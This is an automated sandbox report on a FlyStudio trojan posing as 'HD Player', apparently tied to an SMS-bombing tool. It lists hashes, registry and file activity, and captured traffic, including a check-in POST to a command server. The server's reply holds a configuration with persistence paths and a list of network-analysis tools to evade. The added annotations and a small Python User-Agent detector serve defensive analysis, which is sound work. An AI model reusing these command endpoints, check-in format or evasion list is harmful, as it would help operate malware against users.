Trojan.Win32.FlyStudio_b80a2f4686

by malwarelabrobot on June 28th, 2016 in Malware Descriptions.

Trojan.Win32.FlyStudio.FD, GenericEmailWorm.YR, GenericPhysicalDrive0.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan, Worm, EmailWorm


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.



MD5: b80a2f4686db379c5b6d6b9bb1918398
SHA1: e4094f15ace99750f9106d735fcd169b28bddab3
SHA256: 75b77838f3d9171aa916e91c795af1992e223539f65059d08eb765cbb0f8282b
SSDeep: 49152:pp0qBMZErfDxfZNEMfO7InlG4LKUXWGeRcJI9:DhB2ErfDxTxG7InlG4LKUXHi9
Size: 3104768 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: MicrosoftVisualC50, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, Armadillov171, UPolyXv05_v6
(PEiD signature hits are heuristic. The Armadillo and UPolyX matches conflict with the "Not Packed" entropy verdict and with the low per-section entropies listed under "PE Sections" (4.35, 4.88, 3.53, 1.56), so treat them as false positives unless an unpacking stage is actually observed.)
Company: no certificate found
Created at: 2016-06-08 17:13:09
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse). "FlyStudio" is the family name several AV vendors use for executables built with the Chinese Easy Programming Language (易语言) toolchain; the version information below presents this one as "HD Player" 7.5.1.0.

Payload

Behaviour Description
EmailWorm The automated classifier tags the sample as able to send e-mail. No SMTP or other mail traffic appears in the captured session below (it is HTTP only), so the dynamic trace does not confirm this verdict; weigh it against the caveat at the top of the page.


Process activity

The Trojan creates the following process(es):

attrib.exe:1888

(The attrib.exe command line is not recorded in this report, so which file attributes it changed cannot be told from the trace.)

The Trojan injects its code into the following process(es):

%original file name%.exe:464

(PID 464 is the sample's own process, the one that performs the file and registry changes below, so this is the sandbox recording a write into its own address space rather than injection into another program.)

Mutexes

The following mutexes were created/opened (with the possible exception of AMResourceMutex2, whose origin this report does not establish, these are the standard WinINet, Internet Explorer cache, RAS and AppCompat shim mutexes that any process using those libraries touches; they are not specific to this sample and should not be used as indicators):

AMResourceMutex2
ZonesLockedCacheCounterMutex
ZonesCounterMutex
ZonesCacheCounterMutex
WininetProxyRegistryMutex
WininetConnectionMutex
WininetStartupMutex
c:!documents and settings!adm!local settings!history!history.ie5!
c:!documents and settings!adm!cookies!
c:!documents and settings!adm!local settings!temporary internet files!content.ie5!
_!MSFTHISTORY!_
RasPbFile
ShimCacheMutex

File activity

The process %original file name%.exe:464 makes changes in the file system.
The Trojan creates and/or writes to the following file(s). The Cookies, History and Temporary Internet Files entries are WinINet's own cache files, created as a side effect of the HTTP requests captured below; the sample-specific writes are the two copies of exdui.dll:

%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (791 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@baidu[1].txt (725 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
C:\exdui.dll (42 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (162 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@baidu[2].txt (391 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[1].txt (678 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (234 bytes)
%WinDir%\system\exdui.dll (42 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (11952 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\now_set[1].htm (2413 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (207 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[2].txt (309 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@baidu[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@baidu[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[2].txt (0 bytes)

Registry activity

The process attrib.exe:1888 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8A EE 5D 50 78 40 20 DA 1B CB 09 DF 3D 7C 7B 6A"

(CryptoAPI rewrites this seed whenever a process draws random bytes; it is a side effect of normal API use, not a persistence or configuration artefact. The same applies to the second Seed write further down.)

The process %original file name%.exe:464 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows Script\Settings]
"JITDebug" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "47 86 BE 03 ED 07 DA 08 F5 33 F2 95 18 11 2C A3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The following Internet Explorer zone-map values were also written. WinINet creates exactly these defaults the first time a profile uses it (UNC paths, hosts that bypass the proxy, and single-label host names not assigned to another zone are all treated as Local Intranet), so in this trace they are a side effect of the HTTP requests below rather than a deliberate weakening of the zone configuration:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
"ProxyBypass" = "1"
"IntranetName" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

(The sandbox had no proxy configured, and the same writes are also what WinINet's first-use proxy migration produces (note "MigrateProxy" = "1" above), so the report cannot tell the two apart. On a host that reaches the Internet through a configured proxy, these writes would clear that configuration, which is worth checking when the sample is seen in an enterprise.)

Dropped PE files

MD5 File path
7283299a80a0bcdd07ddb32efa4d0c2c c:\WINDOWS\system\exdui.dll
7283299a80a0bcdd07ddb32efa4d0c2c c:\exdui.dll

(Both copies are 42 bytes long (see "File activity" above), which is smaller than a DOS header alone, so whatever was written under the exdui.dll name is not a loadable PE image despite the table heading. The sample imports a library of that name (see the strings dump), so the hash above identifies a 42-byte placeholder, not a PE payload.)

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: needModify
Product Name: HD Player
Product Version: 7.5.1.0
Legal Copyright: needModify ????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 7.5.1.0
File Description:
Comments:
Language: Language Neutral

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 2152730 2154496 4.34584 c08e7e4aa1b3a82cdcf0de4da8e7559f
.rdata 2158592 469424 471040 4.88172 68c2f9d22dec2394ee6d9fb642650355
.data 2629632 364017 90112 3.53042 4f71eab1b0d8896c3e3e7bdcfbe32c91
.rsrc 2994176 383680 385024 1.55761 719b7d6c28d47e98dacbebe7b82c4eff

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://1.musql.sinaapp.com/tool/get_date.php 220.181.136.27
hxxp://duapp.n.shifen.com/music/url.txt
hxxp://1.musql.sinaapp.com/now_set.php 220.181.136.27
hxxp://56063.vhost18.boxcdn.cn/aaafz_now.asp 116.255.151.25
hxxp://opencdn.jomodns.com/data2/music/6014329382/begin.mp3?xcode=44eee67d7da4c0dffcb4a0d00e046e26805971f83b18ba2f
hxxp://www.a.shifen.com/s?wd=AAA266314320305272344325250273372
hxxp://www.a.shifen.com/s?wd=AAA266314320305272344325250
hxxp://so.qh-lb.com/s?q=aaa短信轰炸机
hxxp://so.seos-lb.com/s?q=aaa短信轰炸机
hxxp://so.qh-lb.com/s?q=aaa短信轰炸
hxxp://so.seos-lb.com/s?q=aaa短信轰炸
hxxp://www.a.shifen.com/s?wd=www.aaazha.com
hxxp://www.haosou.com/s?q=aaa短信轰炸机 101.226.161.132
hxxp://aaafzcloud.duapp.com/music/url.txt 220.181.7.172
hxxp://www.so.com/s?q=aaa短信轰炸 106.120.160.134
hxxp://www.baidu.com/s?wd=www.aaazha.com
hxxp://www.haosou.com/s?q=aaa短信轰炸 101.226.161.132
hxxp://www.baidu.com/s?wd=AAA..........
hxxp://yunshiting.baidu.com/data2/music/6014329382/begin.mp3?xcode=44eee67d7da4c0dffcb4a0d00e046e26805971f83b18ba2f 59.38.112.35
hxxp://www.so.com/s?q=aaa短信轰炸机 106.120.160.134
hxxp://www.baidu.com/s?wd=AAA........
www.sogou.com 106.38.241.37

(The search queries are for the sample's own name: aaa短信轰炸机 / aaa短信轰炸 ("aaa SMS bomber" / "aaa SMS bombing") and www.aaazha.com. The Baidu requests with wd=AAA266314320305272344325250273372 carry the same string GBK-encoded with each byte printed as an octal escape (B6 CC D0 C5 BA E4 D5 A8 BB FA = 短信轰炸机), and the dotted forms AAA.......... in the traffic below are those same ten non-ASCII bytes. Baidu, 360 (so.com / haosou.com), Sogou and the so.qh-lb.com / so.seos-lb.com hosts are all queried with these strings, but nothing is downloaded from them in the trace; the only fetched content comes from the sinaapp.com, duapp.com, boxcdn.cn and yunshiting.baidu.com hosts.)


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY Unsupported/Fake Windows NT Version 5.0
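A small detector for the User-Agent anomalies behind this verdict, written as an added example (it is not part of the Lavasoft report). The log it runs over is constructed from the requests in the Traffic section below, with an assumed client address of 10.0.0.5; the "real" NT version 5.1 passed to inconsistent_sources is the sandbox's Windows XP SP3.

```python
"""Check captured HTTP requests for the User-Agent anomalies behind the
ET POLICY verdict. Added example, not part of the Lavasoft report; the
log below is constructed from the requests shown in the Traffic section,
with a made-up client address (10.0.0.5)."""
import re
from collections import defaultdict

# Constructed sample: (client address, Host header, User-Agent) per request.
SAMPLE_LOG = [
    ("10.0.0.5", "VVV.haosou.com",
     "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"),
    ("10.0.0.5", "yunshiting.baidu.com",
     "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; "
     ".NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)"),
    ("10.0.0.5", "56063.vhost18.boxcdn.cn",
     "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) "
     "Chrome/40.0.2214.10 Safari/537.36"),
    ("10.0.0.5", "1.musql.sinaapp.com",
     "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) "
     "Chrome/40.0.2214.10 Safari/537.36"),
    ("10.0.0.5", "aaafzcloud.duapp.com",
     "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"),
]

NT_VERSION_RE = re.compile(r"Windows NT (\d+\.\d+)")


def claimed_nt_version(user_agent):
    """Return the 'Windows NT x.y' token a User-Agent claims, or None."""
    match = NT_VERSION_RE.search(user_agent)
    return match.group(1) if match else None


def flag_unsupported_ua(log, unsupported=frozenset({"5.0"})):
    """Requests whose UA claims an NT version nobody legitimately runs.
    The default mirrors the ET rule: NT 5.0 is Windows 2000, long out of
    support by 2016, so a client claiming it is almost always a hard-coded
    fake string rather than a real browser."""
    return [(src, host) for src, host, ua in log
            if claimed_nt_version(ua) in unsupported]


def nt_versions_by_source(log):
    """Map each client address to the set of NT versions its requests claim."""
    versions = defaultdict(set)
    for src, _host, ua in log:
        versions[src].add(claimed_nt_version(ua))
    return dict(versions)


def inconsistent_sources(log, real_nt_version):
    """Clients whose requests claim several NT versions, or one that differs
    from the version the host actually runs. One process speaking as
    IE6-on-2000, IE6-on-XP and Chrome-on-8.1 at once is a stronger signal
    than any single fake string."""
    return sorted(src for src, claimed in nt_versions_by_source(log).items()
                  if len(claimed) > 1 or claimed != {real_nt_version})


if __name__ == "__main__":
    print(flag_unsupported_ua(SAMPLE_LOG))
    print(nt_versions_by_source(SAMPLE_LOG))
    print(inconsistent_sources(SAMPLE_LOG, "5.1"))
```

On this log the first check reproduces the ET alert (two requests claiming NT 5.0), and the second shows why the alert is worth acting on: a single client on an XP host presents three different Windows versions within the same minute.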

Traffic

GET /s?q=aaa短信轰炸 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.haosou.com
Cache-Control: no-cache


HTTP/1.1 301 Moved Permanently
Server: openresty
Date: Mon, 27 Jun 2016 17:23:12 GMT
Content-Type: text/html
Content-Length: 178
Connection: keep-alive
Location: hXXp://VVV.so.com/s?q=aaa短信轰炸
<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx</center>
</body>
</html>


GET /data2/music/6014329382/begin.mp3?xcode=44eee67d7da4c0dffcb4a0d00e046e26805971f83b18ba2f HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: yunshiting.baidu.com
Connection: Keep-Alive


HTTP/1.1 401 Unauthorized
Server: JSP3/2.0.14
Date: Mon, 27 Jun 2016 17:22:47 GMT
Content-Type: text/html
Content-Length: 596
Connection: keep-alive
<html>
<head><title>401 Authorization Required</title></head>
<body bgcolor="white">
<center><h1>401 Authorization Required</h1></center>
<hr><center>JSP3/2.0.14</center>
</body>
</html>
<!-- a padding to disable MSIE and Chrome friendly error page -->
(the padding comment is repeated six times to push the body past the size at which IE and Chrome substitute their own error page; the begin.mp3 fetch was refused with 401, so the xcode token distributed via url.txt did not grant access at analysis time)

<<< skipped >>>

GET /aaafz_now.asp HTTP/1.1
Accept: */*
Referer: hXXp://56063.vhost18.boxcdn.cn/aaafz_now.asp
Accept-Language: zh-CN,zh;q=0.8,ja;q=0.6
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.10 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Host: 56063.vhost18.boxcdn.cn
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 113
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSACCQDAA=OMACGOKAEOLAIOMPKJPOJHOF; path=/
Server: IIS
X-Powered-By: WAF/2.0
Set-Cookie: safedog-flow-item=4C893C1B4B31C20B5DCD4F31D2F18866; expires=Tue, 28-Jun-2016 15:59:43 GMT; domain=boxcdn.cn; path=/
Date: Mon, 27 Jun 2016 17:22:42 GMT
[now]_3042[now]
[text]_now_wai1t[text]
[sms]..,..................,..............30....![sms]
[title]....[title]

(113-byte body; bytes outside printable ASCII are shown as dots by the sandbox. The tag-delimited layout is the same one used by the now_set.php configuration further down.)


GET /s?q=aaa短信轰炸机 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.so.com
Cache-Control: no-cache
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: openresty
Date: Mon, 27 Jun 2016 17:23:03 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Set-Cookie: QiHooGUID=AF0346B8A08C32AD86015371124D248C.1467048183492; expires=Wed, 27-Jun-2018 17:23:03 GMT; path=/
Set-Cookie: _S=7jntb5q67uu56url0cboef9g51; expires=Mon, 27-Jun-2016 17:33:03 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tso_Anoyid=11146704818319424268; expires=Wed, 27-Jun-2018 17:23:03 GMT; path=/
5fd8
<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie6"><![endif]-->
<!--[if IE 7 ]><html class="ie7"><![endif]-->
<!--[if IE 8 ]><html class="ie8"><![endif]-->
<!--[if IE 9 ]><html class="ie9"><![endif]-->
<!--[if (gt IE 9)|!(IE)]><!--><html><!--<![endif]-->
<head>
<meta charset="utf-8">
<meta content="always" name="referrer">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<title>aaa短信轰炸机_360搜索</title>
<link rel="dns-prefetch" href="//s0.qhimg.com">
<link rel="dns-prefetch" href="//s1.qhimg.com">
<link rel="dns-prefetch" href="//p0.qhimg.com">
<link rel="dns-prefetch" href="//p1.qhimg.com">
<link rel="shortcut icon" href="hXXp://s0.qhimg.com/static/52166db8c450f68d.ico" type="image/x-icon">
<link rel="search" type="application/opensearchdescription+xml" href="https://VVV.so.com/soopensearch.xml" title="360搜索">
(360 search result page; the capture cuts off here)

<<< skipped >>>

GET /s?q=aaa短信轰炸机 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.haosou.com
Cache-Control: no-cache


HTTP/1.1 301 Moved Permanently
Server: openresty
Date: Mon, 27 Jun 2016 17:22:59 GMT
Content-Type: text/html
Content-Length: 178
Connection: keep-alive
Location: hXXp://VVV.so.com/s?q=aaa短信轰炸机
<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx</center>
</body>
</html>


GET /s?wd=AAA.......... HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.baidu.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Mon, 27 Jun 2016 17:22:49 GMT
Content-Type: text/html;charset=utf-8
Transfer-Encoding: chunked
Connection: Keep-Alive
Vary: Accept-Encoding
Set-Cookie: BAIDUID=5C55CF7E33B2F22B2B44E6E9B323E927:FG=1; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com
Set-Cookie: BIDUPSID=5C55CF7E33B2F22B2B44E6E9B323E927; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com
Set-Cookie: PSTM=1467048168; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com
Set-Cookie: BD_CK_SAM=1;path=/
Set-Cookie: BDSVRTM=147; path=/
Set-Cookie: H_PS_PSSID=20181_1449_20318_18240_17947_20388_19690_14981_11673; path=/; domain=.baidu.com
P3P: CP=" OTI DSP COR IVA OUR IND COM "
Cache-Control: private
Cxy_all: baidu db57f935ce81df23cda6d514358875ec
Cxy_ex: 1467048169 3663786690 d41d8cd98f00b204e9800998ecf8427e
X-Powered-By: HPHP
Server: BWS/1.1
X-UA-Compatible: IE=Edge,chrome=1
BDPAGETYPE: 3
BDQID: 0x96d839aa00022764
BDUSERID: 0
423e
<!DOCTYPE html><!--STATUS OK--><html><head>
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<meta content="always" name="referrer">
<meta name="theme-color" content="#2932e1">
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" sizes="any" mask href="//VVV.baidu.com/img/baidu.svg">
<link rel="search" type="application/opensearchdescription+xml" href="/content-search.xml" title="百度搜索" />
<title>AAA短信轰炸机_百度搜索</title>
<style data-for="result" id="css_newi_result">body{color:#333;background:#fff;padding:6px 0 0;margin:0;position:relative;min-width:900px}
(Baidu result-page stylesheet follows; truncated in the capture)

<<< skipped >>>

GET /s?wd=AAA........ HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.baidu.com
Cache-Control: no-cache
Cookie: BAIDUID=5C55CF7E33B2F22B2B44E6E9B323E927:FG=1; BIDUPSID=5C55CF7E33B2F22B2B44E6E9B323E927; PSTM=1467048168; H_PS_PSSID=20181_1449_20318_18240_17947_20388_19690_14981_11673; BD_CK_SAM=1; BDSVRTM=147


HTTP/1.1 200 OK
Date: Mon, 27 Jun 2016 17:22:51 GMT
Content-Type: text/html;charset=utf-8
Transfer-Encoding: chunked
Connection: Keep-Alive
Vary: Accept-Encoding
Cache-Control: private
Cxy_all: baidu c35c8362936a1e9b9cfe835d90f974c0
Cxy_ex: 1467048171 3663786690 d4488661a98041505f35efc95ebea9bd
X-Powered-By: HPHP
Server: BWS/1.1
X-UA-Compatible: IE=Edge,chrome=1
BDPAGETYPE: 3
BDQID: 0xbe49be350001fa30
BDUSERID: 0
Set-Cookie: BD_CK_SAM=1;path=/
Set-Cookie: BDSVRTM=118; path=/
Set-Cookie: H_PS_PSSID=20181_1449_20318_18240_17947_20388_19690_14981_11673; path=/; domain=.baidu.com
45e
<!DOCTYPE html><!--STATUS OK--><html><head>
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<meta content="always" name="referrer">
<meta name="theme-color" content="#2932e1">
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" sizes="any" mask href="//VVV.baidu.com/img/baidu.svg">
<link rel="search" type="application/opensearchdescription+xml" href="/content-search.xml" title="百度搜索" />
<title>AAA短信轰炸_百度搜索</title>
<style data-for="result" id="css_newi_result">body{color:#333;background:#fff;padding:6px 0 0;margin:0;position:relative;min-width:900px}
(Baidu result-page stylesheet follows; truncated in the capture)

<<< skipped >>>

GET /s?wd=VVV.aaazha.com HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.baidu.com
Cache-Control: no-cache
Cookie: BAIDUID=5C55CF7E33B2F22B2B44E6E9B323E927:FG=1; BIDUPSID=5C55CF7E33B2F22B2B44E6E9B323E927; PSTM=1467048168; H_PS_PSSID=20181_1449_20318_18240_17947_20388_19690_14981_11673; BD_CK_SAM=1; BDSVRTM=118


HTTP/1.1 200 OK
Date: Mon, 27 Jun 2016 17:23:14 GMT
Content-Type: text/html;charset=utf-8
Transfer-Encoding: chunked
Connection: Keep-Alive
Vary: Accept-Encoding
Cache-Control: private
Cxy_all: baidu ba2f273a726b89aa5ff1787079b928b0
Cxy_ex: 1467048194 3663786690 d4488661a98041505f35efc95ebea9bd
X-Powered-By: HPHP
Server: BWS/1.1
X-UA-Compatible: IE=Edge,chrome=1
BDPAGETYPE: 3
BDQID: 0xa61969c100020551
BDUSERID: 0
Set-Cookie: BD_CK_SAM=1;path=/
Set-Cookie: BDSVRTM=96; path=/
Set-Cookie: H_PS_PSSID=20181_1449_20318_18240_17947_20388_19690_14981_11673; path=/; domain=.baidu.com
423e
<!DOCTYPE html><!--STATUS OK--><html><head>
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<meta content="always" name="referrer">
<meta name="theme-color" content="#2932e1">
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" sizes="any" mask href="//VVV.baidu.com/img/baidu.svg">
<link rel="search" type="application/opensearchdescription+xml" href="/content-search.xml" title="百度搜索" />
<title>VVV.aaazha.com_百度搜索</title>
<style data-for="result" id="css_newi_result">body{color:#333;background:#fff;padding:6px 0 0;margin:0;position:relative;min-width:900px}
(Baidu result-page stylesheet follows; truncated in the capture)

<<< skipped >>>

GET /s?q=aaa短信轰炸 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.so.com
Cache-Control: no-cache
Connection: Keep-Alive
Cookie: QiHooGUID=AF0346B8A08C32AD86015371124D248C.1467048183492; _S=7jntb5q67uu56url0cboef9g51; tso_Anoyid=11146704818319424268


HTTP/1.1 200 OK
Server: openresty
Date: Mon, 27 Jun 2016 17:23:13 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
5fb8
<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie6"><![endif]-->
<!--[if IE 7 ]><html class="ie7"><![endif]-->
<!--[if IE 8 ]><html class="ie8"><![endif]-->
<!--[if IE 9 ]><html class="ie9"><![endif]-->
<!--[if (gt IE 9)|!(IE)]><!--><html><!--<![endif]-->
<head>
<meta charset="utf-8">
<meta content="always" name="referrer">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<title>aaa短信轰炸_360搜索</title>
<link rel="dns-prefetch" href="//s0.qhimg.com">
<link rel="dns-prefetch" href="//s1.qhimg.com">
<link rel="dns-prefetch" href="//p0.qhimg.com">
<link rel="dns-prefetch" href="//p1.qhimg.com">
<link rel="shortcut icon" href="hXXp://s0.qhimg.com/static/52166db8c450f68d.ico" type="image/x-icon">
<link rel="search" type="application/opensearchdescription+xml" href="https://VVV.so.com/soopensearch.xml" title="360搜索">
<style type="text/css">body{background:#fff;color:#333;min-width:1000px;position:relative}
(360 result-page stylesheet follows; truncated in the capture)

<<< skipped >>>

POST /now_set.php HTTP/1.1
Accept: */*
Referer: hXXp://1.musql.sinaapp.com/now_set.php
Accept-Language: zh-CN,zh;q=0.8,ja;q=0.6
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.10 Safari/537.36
Host: 1.musql.sinaapp.com
Content-Length: 198
Cache-Control: no-cache

sos=1&key_1=2692bae23b605083O3FZyX53&key_2=3234af4f0b20a7b2j1X8Yc01&ver=7.5&open=ooo750&act=&md_sta=4034861b32b1089a0eea7f55bca043db&time=2016-06-28 01:22:44&onlineF=6dc1659708de495d731b7015aff54add

(Check-in fields: ver=7.5 matches the 7.5.1.0 in VersionInfo; time= is the value returned by the get_date.php request below, so the sample fetches the server clock before checking in; md_sta and onlineF are 32-hex-digit values whose derivation this report does not show.)

HTTP/1.1 200 OK
Server: sae
Date: Mon, 27 Jun 2016 17:22:45 GMT
Content-Type: text/html; charset=uft-8
Transfer-Encoding: chunked
Connection: keep-alive
Via: 10.67.15.39
ad4
[s1]SOFTWARE\Now_warks\[s1]
[s2]%WinDir%\system\WINSPLEDX[s2]
[s3]SOFTWARE\Now_warkO\[s3]
[s4]C:\Windows\show2.jpg[s4]
[s5]hXXp://56063.vhost18.boxcdn.cn/aaafz_now.asp[s5]
[s6]600000[s6]
[b1]%WinDir%\system\JspXmlFora.txt[b1]
[s14]SmartSniff|Fiddler|...............|Wireshark|Charles|WinSock Expert|Ethereal|HttpWatch|HTTP Analyzer|HTTP Debugger|HTTPLook|............|............[s14]
